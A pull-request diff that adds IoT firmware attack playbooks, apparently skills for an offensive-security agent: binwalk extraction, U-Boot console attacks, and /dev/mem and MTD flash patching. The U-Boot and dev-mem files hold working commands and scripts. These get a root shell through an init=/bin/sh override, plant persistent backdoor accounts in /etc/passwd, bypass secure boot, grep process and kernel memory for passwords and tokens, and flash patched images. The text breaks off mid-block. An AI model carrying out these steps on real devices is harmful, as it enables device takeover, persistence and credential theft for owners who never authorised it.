### PR TITLE
feat(skills): IoT firmware leaf playbooks (acquisition, binwalk-extract, hardcoded-creds, U-Boot, dev-mem)

### DIFF
--- a/packages/decepticon/decepticon/skills/standard/iot/binwalk-extract/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/iot/binwalk-extract/SKILL.md
@@ -1,0 +1,251 @@
+---
+name: binwalk-extract
+description: Firmware image extraction with binwalk and firmware-mod-kit — recursive archive carving, squashfs/jffs2/ubifs mounting, entropy analysis to detect packed/encrypted regions, and nested container handling. Entry point for all static filesystem analysis after a raw binary image is acquired.
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: iot
+  when_to_use: binwalk, firmware extract, squashfs mount, jffs2 mount, ubifs, firmware-mod-kit, entropy analysis, nested archive, rootfs extract, firmware analysis
+  tags: iot, firmware, binwalk, squashfs, jffs2, ubifs, extraction, entropy, static-analysis, embedded
+  mitre_attack: T1601, T1592.002, T1083
+---
+
+# Firmware Extraction with binwalk
+
+> Turn a raw binary image into a navigable filesystem tree.
+> binwalk handles most common containers; firmware-mod-kit covers
+> special-case squashfs variants; manual mounting handles the rest.
+
+## Prerequisites
+
+- Raw firmware binary (from `firmware-acquisition` skill).
+- Tools: `binwalk` (≥ 2.3), `sasquatch` (non-standard squashfs decompressor),
+  `jefferson` (JFFS2 extractor), `ubireader` (UBI/UBIFS), `mtd-utils`,
+  `firmware-mod-kit` (FMK), `7-zip`, `lzma`, `xz-utils`.
+
+```bash
+# Kali / Debian install
+sudo apt-get install -y binwalk firmware-mod-kit mtd-utils
+pip3 install jefferson ubireader
+
+# sasquatch (handles non-standard squashfs compression: LZMA, XZ, ZLIB with vendor patches)
+git clone https://github.com/devttys0/sasquatch && cd sasquatch
+./build.sh && sudo cp sasquatch /usr/local/bin/
+```
+
+---
+
+## Step 1 — Identify + Entropy Survey
+
+```bash
+FW=/workspace/evidence/iot/<target>/firmware/flash_full.bin
+
+# Quick filetype + offset scan
+binwalk "$FW"
+
+# Entropy analysis: flat line near 1.0 = encrypted/compressed; structured = filesystem
+binwalk -E "$FW"
+# Output plot to PNG for report
+binwalk -E --save "$FW"     # saves <fw>.png beside the binary
+
+# High entropy region with no signature = encrypted blob — note offset + size
+# Low-to-medium entropy with known FS signature = squashfs/jffs2/cramfs — extract
+```
+
+### Reading the entropy graph
+
+| Entropy range | Interpretation |
+|---|---|
+| 0.0–0.3 | Mostly zero-fill / padding — skip |
+| 0.5–0.8 | Structured data (FS headers, ELF) — extract |
+| 0.8–0.95 | Compressed data (gzip, lzma, zlib) — normal |
+| 0.95–1.0 flat | AES/RSA encrypted or already-compressed blob — flag for key hunt |
+
+---
+
+## Step 2 — Recursive Extraction
+
+```bash
+OUTDIR=/workspace/evidence/iot/<target>/extracted
+
+# Recursive extraction (-M), follow symlinks (-r), output to dedicated dir (-C)
+binwalk -eM -C "$OUTDIR" "$FW"
+
+# Inspect what was carved
+find "$OUTDIR" -maxdepth 4 -type f | head -60
+ls -lah "$OUTDIR"/_*
+```
+
+### Common extraction outputs
+
+```
+_flash_full.bin.extracted/
+  squashfs-root/          ← mounted squashfs rootfs
+  40          ← raw uImage kernel (strip 64-byte header for vmlinuz)
+  40.7z       ← carved archive at offset 0x40
+  A00000      ← raw block at offset 0xA00000
+```
+
+---
+
+## Step 3 — Squashfs (standard + vendor variants)
+
+```bash
+SQFS=$(find "$OUTDIR" -name "*.squashfs" -o -name "squashfs-root.img" 2>/dev/null | head -1)
+
+# Standard unsquashfs
+unsquashfs -d /tmp/squashfs_root "$SQFS"
+
+# Non-standard (Broadcom LZMA, TP-Link XZ, vendor-patched):
+sasquatch -d /tmp/squashfs_root "$SQFS"
+
+# If both fail, force a specific compression type:
+sasquatch -p 1 -le -d /tmp/squashfs_root "$SQFS"   # little-endian
+sasquatch -p 1 -be -d /tmp/squashfs_root "$SQFS"   # big-endian
+
+# Verify extraction
+ls /tmp/squashfs_root/{bin,etc,lib,usr,var} 2>/dev/null
+```
+
+---
+
+## Step 4 — JFFS2
+
+```bash
+JFFS2_IMG=$(find "$OUTDIR" -name "*.jffs2" 2>/dev/null | head -1)
+
+# Method A: jefferson (Python, handles most variants)
+jefferson "$JFFS2_IMG" -d /tmp/jffs2_root
+
+# Method B: kernel loop mount (requires modprobe jffs2 + mtdram)
+sudo modprobe mtdram total_size=65536 erase_size=256
+sudo modprobe mtdblock
+sudo dd if="$JFFS2_IMG" of=/dev/mtd0
+sudo mount -t jffs2 /dev/mtdblock0 /mnt/jffs2
+```
+
+---
+
+## Step 5 — UBIFS (NAND-based devices)
+
+```bash
+UBI_IMG=$(find "$OUTDIR" -name "*.ubi" -o -name "*.ubifs" 2>/dev/null | head -1)
+
+# ubireader_extract_files: most direct path
+ubireader_extract_files -o /tmp/ubifs_root "$UBI_IMG"
+
+# For raw UBI volume images, ubiextract:
+sudo modprobe ubi
+sudo ubiattach -m 0 -d 0 /dev/ubi_ctrl
+sudo mount -t ubifs /dev/ubi0_0 /mnt/ubifs
+```
+
+---
+
+## Step 6 — Manual Carving (when binwalk misses)
+
+```bash
+# Find filesystem magic bytes manually
+python3 -c "
+import sys
+data = open('$FW','rb').read()
+sigs = {b'hsqs': 'SquashFS LE', b'sqsh': 'SquashFS BE',
+        b'\\x19\\x85': 'JFFS2', b'UBI#': 'UBI', b'\\x27\\x05\\x19\\x56': 'uImage'}
+for sig, name in sigs.items():
+    off = 0
+    while True:
+        idx = data.find(sig, off)
+        if idx == -1: break
+        print(f'  {name} @ 0x{idx:08x}')
+        off = idx + 1"
+
+# Carve a specific region for separate analysis
+dd if="$FW" bs=1 skip=$((0xA00000)) count=$((0x600000)) of=/tmp/carved_rootfs.bin
+
+# Run binwalk on the carved piece
+binwalk -eM -C /tmp/carved_extract /tmp/carved_rootfs.bin
+```
+
+---
+
+## Step 7 — Nested Archive Handling
+
+```bash
+# Device firmware often wraps: .zip/.tar → signed header → lzma → squashfs
+# firmware-mod-kit handles multi-layer TP-Link / Netgear / Asus formats:
+cd /opt/firmware-mod-kit
+./extract-firmware.sh "$FW"
+ls /tmp/fmk/
+
+# D-Link WRGG (proprietary container):
+binwalk --dd='.*' "$FW"     # dump ALL matched signatures
+file _*.extracted/*
+
+# Lzma-raw regions binwalk missed (entropy ~0.9, no gzip magic):
+lzma -d < /tmp/region.lzma > /tmp/region.decompressed
+xz -d < /tmp/region.xz > /tmp/region.decompressed
+```
+
+---
+
+## Step 8 — Post-Extraction Triage
+
+```bash
+ROOT=/tmp/squashfs_root   # adjust to wherever rootfs landed
+
+# Architecture + OS identification
+file "$ROOT/bin/busybox"
+readelf -h "$ROOT/bin/busybox" | grep -E "Machine|Class|Data"
+
+# Enumerate interesting paths
+ls "$ROOT/etc/"
+ls "$ROOT/usr/bin/" | head -40
+find "$ROOT" -name "*.conf" -o -name "*.ini" -o -name "*.cfg" | head -30
+
+# SUID / SGID binaries (potential priv-esc on device)
+find "$ROOT" -perm -u=s -type f 2>/dev/null
+find "$ROOT" -perm -g=s -type f 2>/dev/null
+
+# World-writable directories (writeable by web/telnet processes)
+find "$ROOT" -perm -o=w -type d 2>/dev/null | grep -v proc
+
+# Symlinks that escape the rootfs (path traversal potential)
+find "$ROOT" -type l | while read l; do
+    target=$(readlink "$l")
+    echo "$l -> $target"
+done | grep '^\.\.'
+```
+
+---
+
+## Evidence
+
+```bash
+EVDIR=/workspace/evidence/iot/<target>/extracted
+mkdir -p "$EVDIR"
+# Save extraction tree summary
+find /tmp/squashfs_root -type f > "$EVDIR/file_tree.txt"
+# Save entropy plot
+cp "$FW.png" "$EVDIR/entropy_plot.png" 2>/dev/null || true
+# Note encrypted regions for follow-up
+echo "Encrypted blob @ 0xXXXXXX, length 0xYYY — likely AES-CBC, key TBD" \
+    >> "$EVDIR/notes.txt"
+```
+
+## OPSEC Notes
+
+- `binwalk -eM` can write gigabytes if the firmware contains recursive containers;
+  run on a dedicated partition or tmpfs with sufficient space.
+- Some vendor firmware images are signed; extraction still works (signature is just
+  a header — binwalk skips it). Repacking for re-flash requires bypassing signature
+  verification (see `bootloader-uboot` skill).
+- Encrypted regions at entropy ≈ 1.0 with no detectable IV/tag structure may indicate
+  XTS-AES or ChaCha20 stream — note the offset; search the OTA update binary or
+  companion app for the key material.
+
+## References
+
+- binwalk docs: `https://github.com/ReFirmLabs/binwalk/wiki`
+- sasquatch: `https://github.com/devttys0/sasquatch`
+- jefferson (JFFS2): `https://github.com/sviehb/jefferson`
+- ubireader: `https://github.com/jrspruitt/ubi_reader`
+- firmware-mod-kit: `https://github.com/rampageX/firmware-mod-kit`

--- a/packages/decepticon/decepticon/skills/standard/iot/bootloader-uboot/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/iot/bootloader-uboot/SKILL.md
@@ -1,0 +1,342 @@
+---
+name: bootloader-uboot
+description: U-Boot bootloader attack playbook — console interrupt to break the autoboot countdown, environment variable inspection and manipulation, bootargs override to spawn init=/bin/sh, secure-boot bypass techniques, and fault-injection basics (voltage and clock glitching). Covers MIPS, ARM, and AArch64 targets.
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: iot
+  when_to_use: U-Boot, uboot, bootloader, autoboot, printenv, setenv, bootargs, init=/bin/sh, secure boot bypass, fault injection, glitching, boot console, UART bootloader, embedded Linux boot
+  tags: iot, uboot, bootloader, uart, console, secure-boot, fault-injection, glitching, embedded, linux-boot
+  mitre_attack: T1542.005, T1542.003, T1601.001
+---
+
+# U-Boot Bootloader Attack
+
+> U-Boot is the dominant open-source bootloader for embedded Linux devices.
+> A UART console with an unpatched autoboot allows complete OS compromise
+> without touching the running filesystem: override `bootargs`, pass
+> `init=/bin/sh`, and land a root shell before `init` starts.
+
+## Prerequisites
+
+- UART console connected (see `firmware-acquisition` skill, Tier 1).
+- Serial terminal: `screen /dev/ttyUSB0 115200` or `picocom -b 115200 /dev/ttyUSB0`.
+- Physical access to power-cycle the device.
+- Tools (optional, for scripted attacks): `minicom`, `expect`, `python3-serial`.
+
+---
+
+## Phase 1 — Console Interrupt
+
+### 1a. Manual interrupt
+
+```
+1. Open serial terminal BEFORE powering device.
+2. Apply power.
+3. Watch for U-Boot banner:
+     U-Boot 2020.01 (Jan 01 2020)
+     ...
+     Hit any key to stop autoboot: 3 2 1
+4. Press any key (spacebar reliable) during countdown to get '=>' prompt.
+```
+
+If autoboot completes before interrupt: power-cycle and try again. Some
+devices accept keys up to 500ms before the countdown appears.
+
+### 1b. When autoboot_delay is 0 or password-protected
+
+```bash
+# Approach A: Interrupt via UART break signal (before U-Boot banner)
+python3 -c "
+import serial, time
+s = serial.Serial('/dev/ttyUSB0', 115200)
+s.send_break(duration=0.5)
+time.sleep(0.1)
+s.write(b'\r\n')
+print(s.read(200))"
+
+# Approach B: Hardware glitch to reset autoboot timer (see Phase 5)
+
+# Approach C: Some vendors compile with CONFIG_AUTOBOOT_KEYED_CTRLC=y
+#   Try: Ctrl+C, then 'adc', then model-specific passwords
+#   Common: 'aDm1n+' '3008' 'anko' 'GM8182' 'realtekk' 'password'
+```
+
+---
+
+## Phase 2 — Environment Inspection
+
+```bash
+# At U-Boot => prompt:
+
+# Print ALL environment variables
+printenv
+
+# Key variables to examine:
+# bootargs    = kernel command line (target for init override)
+# bootcmd     = boot command sequence (target for persistence)
+# ipaddr      = device IP (useful for TFTP)
+# serverip    = TFTP server IP
+# netmask     = subnet mask
+# mtdparts    = flash partition map (offsets for SPI dump / write)
+# fdtcontroladdr = FDT address (check secure-boot flags here)
+```
+
+### 2a. Flash partition map extraction
+
+```
+=> mtdparts
+=> flinfo           # (older U-Boot) detailed partition info
+=> cat /proc/mtd    # (from Linux, if booting fails) — compare with mtdparts
+```
+
+Expected output example:
+```
+mtdparts=spi0.0:256k(u-boot),64k(u-boot-env),64k(factory),2048k(kernel),5888k(rootfs),-(storage)
+```
+
+---
+
+## Phase 3 — bootargs Override → init=/bin/sh
+
+This is the primary exploitation primitive: replace the kernel init process
+with a root shell before any authentication or privilege separation occurs.
+
+```bash
+# Inspect current bootargs
+=> printenv bootargs
+# Example: root=/dev/mtdblock3 rootfstype=squashfs console=ttyS0,115200 noinitrd
+
+# Override: append init=/bin/sh (or replace init entirely)
+=> setenv bootargs "root=/dev/mtdblock3 rootfstype=squashfs console=ttyS0,115200 noinitrd init=/bin/sh"
+
+# Boot with modified args (trigger the original bootcmd)
+=> run bootcmd
+
+# Alternative: load kernel manually and boot with setenv bootargs
+=> tftpboot 0x80000000 uImage
+=> setenv bootargs "root=/dev/mtdblock3 rootfstype=squashfs console=ttyS0,115200 init=/bin/sh"
+=> bootm 0x80000000
+```
+
+Once the kernel drops to `/bin/sh`:
+```bash
+# Remount rootfs read-write
+mount -o remount,rw /
+# Add backdoor account
+echo 'backdoor:x:0:0:root:/root:/bin/sh' >> /etc/passwd
+# Set password
+passwd backdoor    # or directly edit shadow
+# Or extract /etc/shadow for offline crack
+cat /etc/shadow
+```
+
+### 3a. Single-user mode (alternative)
+
+```bash
+# Append 'single' or 'S' to bootargs for systemd/SysV init single-user mode
+=> setenv bootargs "${bootargs} single"
+=> run bootcmd
+```
+
+---
+
+## Phase 4 — Persistent Environment Modification
+
+```bash
+# Save modified environment to flash (survives reboot)
+=> saveenv
+# Warning: only do this if persistence is in RoE scope.
+# Revert with:
+=> setenv bootcmd "<original_value>"
+=> saveenv
+
+# Add persistent backdoor via bootcmd (executes on every boot)
+=> setenv bootcmd "run addbackdoor; run origbootcmd"
+=> setenv addbackdoor "run bootargs; echo 'backdoor::0:0::/:/bin/sh' >> /etc/passwd"
+# NOTE: >> redirect not available in all U-Boot versions; use fatwrite / ext4write instead
+
+# Persist via TFTP-loaded script
+=> setenv serverip 192.168.1.10
+=> setenv ipaddr 192.168.1.100
+=> tftpboot 0x80000000 payload.scr
+=> source 0x80000000
+```
+
+---
+
+## Phase 5 — Secure Boot Bypass
+
+### 5a. Identify secure boot configuration
+
+```bash
+# At U-Boot prompt:
+=> printenv secure_boot  # vendor-specific variable name
+=> bdinfo                # board info, check CPU flags
+=> fuse status           # (i.MX targets) read eFuse state
+=> hab_status            # i.MX HAB (High Assurance Boot) status
+```
+
+### 5b. FDT (Device Tree) manipulation
+
+```bash
+# Load FDT and inspect secure-boot flag
+=> fdt addr 0x84000000
+=> fdt list /
+=> fdt print /chosen     # often contains kernel cmdline + secure flags
+# Override secure-boot flag in FDT if not eFuse-locked:
+=> fdt set /chosen secure_boot <0>
+```
+
+### 5c. Rollback attack (firmware downgrade)
+
+```bash
+# U-Boot environment may expose update URL or version check
+=> printenv | grep -i "version\|rollback\|fw_"
+# If firmware version check is in env, not eFuse:
+=> setenv fw_version 0
+=> run upgrade_check     # may allow older (unpatched) firmware load
+```
+
+### 5d. Bootloader replacement via TFTP (if no verified boot)
+
+```bash
+# Flash an unsigned / patched U-Boot (only if RoE permits flash writes)
+=> tftpboot 0x80000000 u-boot.bin
+=> sf probe
+=> sf erase 0x0 0x40000
+=> sf write 0x80000000 0x0 0x40000
+# Risk: brick if image is wrong size/offset — verify mtdparts first
+```
+
+---
+
+## Phase 6 — Fault Injection (Voltage / Clock Glitching)
+
+Fault injection bypasses secure-boot signature checks by corrupting the
+CPU instruction stream during the signature verification window.
+
+### 6a. ChipWhisperer-Nano (voltage glitching)
+
+```python
+# ChipWhisperer Python API — target: STM32F4 or similar MCU bootloader
+import chipwhisperer as cw
+
+scope = cw.scope()
+scope.default_setup()
+scope.glitch.clk_src = "clkgen"
+scope.glitch.output = "glitch_only"
+scope.glitch.trigger_src = "ext_single"
+scope.glitch.width = 24       # tune: 10-50 for most Cortex-M targets
+scope.glitch.offset = 1200    # tune: trigger offset from reset release
+scope.io.glitch_hp = True
+
+target = cw.target(scope)
+scope.arm()
+# Power-cycle target; glitch fires at offset, corrupting signature check
+ret = scope.capture()
+resp = target.read(100)
+print(resp)  # 'BOOT OK' or similar = bypass success
+```
+
+### 6b. Raspberry Pi clock glitcher (low-cost alternative)
+
+```bash
+# pigpio-based clock glitch on GPIO-connected CLK line
+# https://github.com/nstarke/raspberry-pi-glitcher
+python3 glitch.py --offset 1000 --width 50 --pin 18
+```
+
+### 6c. Manual crowbar glitch (bench power supply)
+
+```
+1. Identify VCC_CORE rail (typically 1.0–1.2 V for application processor).
+2. Place 10 Ω resistor + MOSFET crowbar on VCC_CORE rail.
+3. Trigger MOSFET via microcontroller at measured delay after reset release.
+4. Iterate offset + duration until signature check returns True (CPU skipped
+   the branch-if-fail or corrupted the RSA modulus comparison).
+```
+
+---
+
+## Scripted Autoboot Interrupt (Python)
+
+```python
+#!/usr/bin/env python3
+"""Automated U-Boot console interrupt + bootargs override."""
+import serial, time, sys
+
+PORT = "/dev/ttyUSB0"
+BAUD = 115200
+INIT_OVERRIDE = "init=/bin/sh"
+
+s = serial.Serial(PORT, BAUD, timeout=2)
+print("[*] Waiting for U-Boot banner...")
+
+buffer = b""
+while b"autoboot" not in buffer.lower() and b"stop autoboot" not in buffer.lower():
+    chunk = s.read(256)
+    buffer += chunk
+    sys.stdout.buffer.write(chunk)
+    sys.stdout.buffer.flush()
+
+print("\n[*] Sending interrupt...")
+for _ in range(10):
+    s.write(b" ")
+    time.sleep(0.05)
+
+time.sleep(0.3)
+response = s.read(256)
+if b"=>" not in response:
+    print("[-] No U-Boot prompt — try manual interrupt")
+    sys.exit(1)
+
+print("[+] U-Boot prompt obtained")
+s.write(b"printenv bootargs\r\n"); time.sleep(0.3)
+ba = s.read(512).decode(errors="replace")
+print(ba)
+
+# Extract existing bootargs line
+for line in ba.splitlines():
+    if line.startswith("bootargs="):
+        orig = line[len("bootargs="):]
+        break
+
+new_args = orig.rstrip() + f" {INIT_OVERRIDE}"
+s.write(f'setenv bootargs "{new_args}"\r\n'.encode()); time.sleep(0.3)
+s.write(b"run bootcmd\r\n")
+print(f"[+] Sent: setenv bootargs with {INIT_OVERRIDE}")
+print("[*] Booting — watch terminal for /bin/sh prompt")
+```
+
+---
+
+## Evidence
+
+```bash
+EVDIR=/workspace/evidence/iot/<target>/bootloader
+mkdir -p "$EVDIR"
+# Capture full printenv output
+tee "$EVDIR/uboot_env.txt"    # pipe terminal session output
+# Document the bootargs override chain
+echo "bootargs override: init=/bin/sh appended; root shell obtained at $(date -u +%FT%TZ)" \
+    >> "$EVDIR/notes.txt"
+```
+
+## OPSEC Notes
+
+- `saveenv` writes to flash and is persistent — only use if persistence is
+  explicitly in scope. Failing to revert leaves a modified device.
+- Voltage glitching can permanently damage the target SoC. Use on expendable
+  test units; not on production hardware without explicit authorization.
+- HAB-enabled i.MX targets log boot failures to a one-time-programmable counter;
+  excessive failed attempts may lock the device permanently.
+- Some vendors monitor UART console activity via cloud telemetry — confirm
+  the device is air-gapped or network-isolated before console work.
+
+## References
+
+- U-Boot command reference: `https://u-boot.readthedocs.io/en/latest/usage/index.html`
+- ChipWhisperer-Nano: `https://rtfm.newae.com/Capture/ChipWhisperer-Nano/`
+- i.MX HAB (secure boot): `https://docs.nxp.com/bundle/AN4581`
+- Fault injection fundamentals: `https://tches.iacr.org/index.php/TCHES/article/view/7390`
+- practical-iot-hacking (No Starch): Chapter 9 — U-Boot attacks

--- a/packages/decepticon/decepticon/skills/standard/iot/dev-mem/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/iot/dev-mem/SKILL.md
@@ -1,0 +1,319 @@
+---
+name: dev-mem
+description: Runtime memory access and manipulation on embedded Linux via /dev/mem, /dev/kmem, and MTD devices. Covers physical memory reads/writes, kernel symbol resolution via /proc/kallsyms, live firmware patching with mtd_debug and flashcp, and bypassing memory-access restrictions (CONFIG_STRICT_DEVMEM, kernel.perf_event_paranoid).
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: iot
+  when_to_use: /dev/mem, /dev/kmem, MTD write, mtd_debug, flashcp, memory patch, runtime patch, kernel memory, /proc/kallsyms, devmem2, embedded memory access, live firmware patch
+  tags: iot, devmem, kmem, mtd, flashcp, memory-patching, kallsyms, embedded-linux, runtime, kernel
+  mitre_attack: T1601.001, T1601.002, T1068, T1543
+---
+
+# /dev/mem, /dev/kmem, and MTD Runtime Patching
+
+> On embedded Linux, physical memory and raw flash are often accessible
+> as character devices. Combined with /proc/kallsyms for kernel symbol
+> resolution, these interfaces allow runtime rootkit injection, credential
+> extraction, and live firmware modification without touching the filesystem.
+
+## Prerequisites
+
+- Shell access on the target (obtained via UART/SSH/telnet or post-exploitation).
+- Target runs Linux (confirms with `uname -a`).
+- Check access: `ls -la /dev/mem /dev/kmem /dev/mtd*`.
+- Tools: `devmem2` (or `/dev/mem` via dd), `mtd_debug`, `flashcp`, `busybox devmem`.
+
+```bash
+# Confirm device nodes exist
+ls -la /dev/mem /dev/kmem /dev/mtd* 2>/dev/null
+
+# Confirm kernel version and MTD subsystem
+uname -a
+cat /proc/mtd
+```
+
+---
+
+## Phase 1 — Physical Memory Read via /dev/mem
+
+### 1a. devmem2 (most common embedded tool)
+
+```bash
+# Read 4-byte word at physical address 0x10000000
+devmem2 0x10000000 w
+
+# Read byte at address
+devmem2 0x10000000 b
+
+# Write 4-byte word (use carefully — can crash SoC peripherals)
+devmem2 0x10000000 w 0xDEADBEEF
+
+# BusyBox devmem (same syntax on BusyBox builds)
+busybox devmem 0x10000000 32
+```
+
+### 1b. dd + /dev/mem
+
+```bash
+# Dump 4KB region of physical RAM starting at 0x80000000 (DRAM base on many MIPS/ARM)
+dd if=/dev/mem bs=1024 skip=$((0x80000000 / 1024)) count=4 > /tmp/mem_region.bin
+
+# Read peripheral register (e.g., GPIO base on BCM2835 = 0x3F200000)
+dd if=/dev/mem bs=4 skip=$((0x3F200034 / 4)) count=1 2>/dev/null | xxd
+
+# Search physical RAM for a string (e.g., password, key material)
+strings /dev/mem 2>/dev/null | grep -iE 'password|secret|key|token' | head -20
+
+# Dump first 32MB of DRAM to exfil
+dd if=/dev/mem bs=1M count=32 of=/tmp/memdump_32m.bin
+```
+
+### 1c. Bypass CONFIG_STRICT_DEVMEM
+
+Kernels with `CONFIG_STRICT_DEVMEM=y` block non-MMIO physical addresses.
+
+```bash
+# Check if restriction is active
+dmesg 2>/dev/null | grep -i "devmem\|mem: Checking"
+
+# Bypass A: MMIO regions are always permitted — map peripheral registers
+#   GPIO, UART, timers are MMIO and bypass STRICT_DEVMEM checks.
+
+# Bypass B: Use /proc/kcore (virtual kernel memory, may still be available)
+dd if=/proc/kcore bs=1M count=8 of=/tmp/kcore_partial.bin 2>/dev/null
+
+# Bypass C: Kernel module injection via /dev/kmem (see Phase 2)
+
+# Bypass D: mmap /proc/<pid>/mem of a privileged process
+# (works when CAP_SYS_PTRACE is available)
+cat /proc/1/maps | grep heap
+dd if=/proc/1/mem bs=1 skip=$((heap_start)) count=4096 of=/tmp/init_heap.bin 2>/dev/null
+```
+
+---
+
+## Phase 2 — Kernel Memory via /dev/kmem
+
+`/dev/kmem` exposes virtual kernel address space. Available on older kernels
+(pre-3.7) or when compiled without `CONFIG_DEVKMEM=n`.
+
+```bash
+# Check kernel virtual addresses from kallsyms
+# (available when CONFIG_KALLSYMS=y, common on embedded devices for crash debugging)
+cat /proc/kallsyms | grep -E ' sys_call_table| commit_creds| prepare_kernel_cred'
+# Example: ffffffff81801460 R sys_call_table
+
+# Read kernel symbol value via /dev/kmem
+SYM_ADDR=0xffffffff81801460
+dd if=/dev/kmem bs=8 skip=$(( SYM_ADDR / 8 )) count=1 2>/dev/null | xxd
+
+# Patch a kernel variable (e.g., set uid to 0 for current process)
+# WARNING: wrong address = immediate kernel panic
+# Use devmem2 with the virtual address:
+devmem2 $SYM_ADDR q    # quad-word read (64-bit)
+```
+
+### 2a. Extract kernel credentials from /proc/kcore
+
+```bash
+# /proc/kcore is ELF-formatted kernel memory snapshot
+# Use volatility3 with a Linux profile if available:
+vol -f /proc/kcore linux.bash.Bash    # recover bash history from kernel
+vol -f /proc/kcore linux.pslist.PsList
+
+# Manual: search for credential structures
+strings /proc/kcore 2>/dev/null | grep -E 'root|password|shadow' | head -20
+```
+
+---
+
+## Phase 3 — MTD Raw Flash Access
+
+MTD (Memory Technology Devices) exposes raw NOR/NAND flash. On embedded Linux,
+`/dev/mtd*` (char) and `/dev/mtdblock*` (block) devices are the primary paths
+for read/write access to firmware partitions.
+
+### 3a. Partition enumeration
+
+```bash
+# List all MTD partitions with sizes and names
+cat /proc/mtd
+# Example output:
+# dev:    size   erasesize  name
+# mtd0: 00040000 00010000 "u-boot"
+# mtd1: 00010000 00010000 "u-boot-env"
+# mtd2: 00200000 00010000 "kernel"
+# mtd3: 00600000 00010000 "rootfs"
+# mtd4: 00200000 00010000 "storage"
+```
+
+### 3b. Dump MTD partition
+
+```bash
+# Method A: dd from block device
+dd if=/dev/mtdblock3 of=/tmp/rootfs.bin bs=512
+
+# Method B: mtd_debug read (preferred — handles bad blocks on NAND)
+mtd_debug read /dev/mtd3 0 $((0x600000)) /tmp/rootfs_debug.bin
+
+# Method C: nanddump (NAND-aware, includes OOB handling)
+nanddump --noecc --omitoob /dev/mtd3 -f /tmp/rootfs_nand.bin
+```
+
+### 3c. Write (patch) an MTD partition
+
+```bash
+# DANGER: Writing to wrong partition bricks the device.
+# Always verify partition map and backup before writing.
+
+# Step 1: Backup the partition to be patched
+mtd_debug read /dev/mtd3 0 $((0x600000)) /tmp/rootfs_backup.bin
+sha256sum /tmp/rootfs_backup.bin > /tmp/rootfs_backup.bin.sha256
+
+# Step 2: Modify the backup (e.g., inject backdoor account into /etc/passwd)
+# Mount squashfs, modify, repack, place in /tmp/rootfs_patched.bin
+
+# Step 3: Erase the MTD partition (REQUIRED before write on NOR flash)
+flash_erase /dev/mtd3 0 0        # erase entire partition
+# Or with mtd_debug:
+mtd_debug erase /dev/mtd3 0 $((0x600000))
+
+# Step 4: Write patched image
+flashcp -v /tmp/rootfs_patched.bin /dev/mtd3
+# Or mtd_debug write:
+mtd_debug write /dev/mtd3 0 $((0x600000)) /tmp/rootfs_patched.bin
+
+# Step 5: Verify write
+mtd_debug read /dev/mtd3 0 $((0x600000)) /tmp/rootfs_verify.bin
+diff /tmp/rootfs_patched.bin /tmp/rootfs_verify.bin && echo "WRITE OK" || echo "MISMATCH"
+```
+
+### 3d. U-Boot environment modification via MTD
+
+```bash
+# U-Boot env is typically in mtd1 (check /proc/mtd for "u-boot-env")
+UBOOT_ENV_MTD=/dev/mtd1
+
+# Dump current env
+dd if=/dev/mtdblock1 of=/tmp/uboot_env.bin
+
+# Decode: first 4 bytes = CRC32, then null-delimited key=value pairs
+python3 -c "
+import struct, zlib
+data = open('/tmp/uboot_env.bin','rb').read()
+crc_stored = struct.unpack('<I', data[:4])[0]
+crc_calc = zlib.crc32(data[4:]) & 0xFFFFFFFF
+print(f'CRC stored: {crc_stored:#010x}, calc: {crc_calc:#010x}')
+env = data[4:].split(b'\\x00')
+for e in env:
+    if e: print(e.decode(errors='replace'))
+"
+
+# Modify env and rewrite with correct CRC
+python3 << 'EOF'
+import struct, zlib
+
+env_vars = {
+    "bootargs": "root=/dev/mtdblock3 rootfstype=squashfs console=ttyS0,115200 init=/bin/sh",
+    "bootcmd": "run bootlinux",
+    # add more vars as needed
+}
+
+# Build null-delimited env block (standard U-Boot env size = 64KB)
+ENV_SIZE = 0x10000
+payload = b""
+for k, v in env_vars.items():
+    payload += f"{k}={v}\x00".encode()
+payload += b"\x00"
+payload = payload.ljust(ENV_SIZE - 4, b"\xff")
+
+crc = struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)
+with open("/tmp/uboot_env_patched.bin", "wb") as f:
+    f.write(crc + payload)
+print("Patched env written")
+EOF
+
+# Flash patched env
+flash_erase /dev/mtd1 0 0
+flashcp /tmp/uboot_env_patched.bin /dev/mtd1
+```
+
+---
+
+## Phase 4 — Live Process Memory Access
+
+```bash
+# List running processes with memory maps
+cat /proc/1/maps       # init/systemd
+# Identify heap/stack regions
+
+# Read from process memory (requires same UID or root)
+# Read 256 bytes at heap start of PID 1234
+HEAP_START=0x00400000  # from /proc/1234/maps
+dd if=/proc/1234/mem bs=1 skip=$HEAP_START count=256 of=/tmp/pid_mem.bin 2>/dev/null
+
+# Search for credentials in web server process memory (lighttpd / httpd)
+WEB_PID=$(pgrep lighttpd || pgrep httpd || pgrep uhttpd)
+strings /proc/$WEB_PID/mem 2>/dev/null | grep -iE 'password|session|token' | head -20
+
+# GDB (if available) — attach to running process
+gdb -p $WEB_PID -batch -ex "x/512s 0x$(grep heap /proc/$WEB_PID/maps | head -1 | cut -d- -f1)" \
+    2>/dev/null | grep -iE 'password|secret|key'
+```
+
+---
+
+## Phase 5 — /proc/kallsyms Exploitation
+
+```bash
+# Read symbol table (requires root or kernel.kptr_restrict=0)
+cat /proc/kallsyms | grep -E 'sys_call_table|commit_creds|prepare_kernel_cred|selinux'
+
+# Check kptr_restrict setting
+cat /proc/sys/kernel/kptr_restrict
+# 0 = all addresses visible, 1 = visible to root, 2 = hidden always
+
+# Lower restriction (if writable — common on IoT with permissive sysctl)
+echo 0 > /proc/sys/kernel/kptr_restrict
+
+# Use symbol addresses for kernel exploit primitives
+# commit_creds(prepare_kernel_cred(0)) pattern for local priv-esc
+# (pass to kernel module or mmap-based shellcode)
+```
+
+---
+
+## Evidence
+
+```bash
+EVDIR=/workspace/evidence/iot/<target>/devmem
+mkdir -p "$EVDIR"
+cp /tmp/memdump_32m.bin "$EVDIR/" 2>/dev/null
+cp /tmp/rootfs_backup.bin "$EVDIR/" 2>/dev/null
+sha256sum "$EVDIR"/*.bin > "$EVDIR/checksums.sha256"
+echo "MTD partition map:" >> "$EVDIR/notes.txt"
+cat /proc/mtd >> "$EVDIR/notes.txt"
+echo "kallsyms sys_call_table:" >> "$EVDIR/notes.txt"
